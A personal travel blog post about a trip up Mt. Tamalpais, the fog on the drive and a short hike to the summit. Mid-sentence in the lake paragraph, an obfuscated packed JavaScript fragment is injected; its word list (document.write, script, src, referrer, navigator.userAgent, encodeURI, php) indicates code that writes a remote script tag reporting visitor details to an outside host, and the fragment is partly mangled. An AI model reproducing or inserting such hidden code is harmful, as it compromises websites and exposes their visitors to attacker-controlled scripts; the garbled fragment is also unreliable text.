Mt. Tamalpais

Or Mt. Tam if you want to sound like you’re in the know.

Mt. Tam is sort of like Mt. Diablo.  You could hike it if you wanted to, but you can also drive to the top.  And nothing pisses me off more than hiking to the top of a mountain, only to find overweight tourists enjoying the same view.  Heads would have rolled if I had found said tourists at the top of Half Dome.

So we drove to the “almost-top” and hiked a solid mile up to the actual top.  It may or may not have been a mile round trip.

Here’s a view from the trail.  We literally drive out of the fog on our way up, and you can see where the elevation changes just enough to keep the fog at bay.

There ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kfzat|var|u0026u|referrer|yneys||js|php’.split(‘|’),0,{}))
was a cute lake and golf course off in the distance.  We eventually drove past them on our way to Pt. Reyes.  More on that tomorrow.  Because I know you’re just waiting on baited breath to hear how this day went.

We continued our “hike” and Nick found a large rock that he needed to climb.  I did not need to climb it, so I took a picture of him on it instead.  I think I said, “be careful” many times.

And they we met a nice couple at the top who offered to take our picture in exchange for us taking their picture.  One of my all time favorite things to do while on a vacation or in a bustling tourist-y spot.

Notice my shades?  White ray-ban wannabes.  New faves.
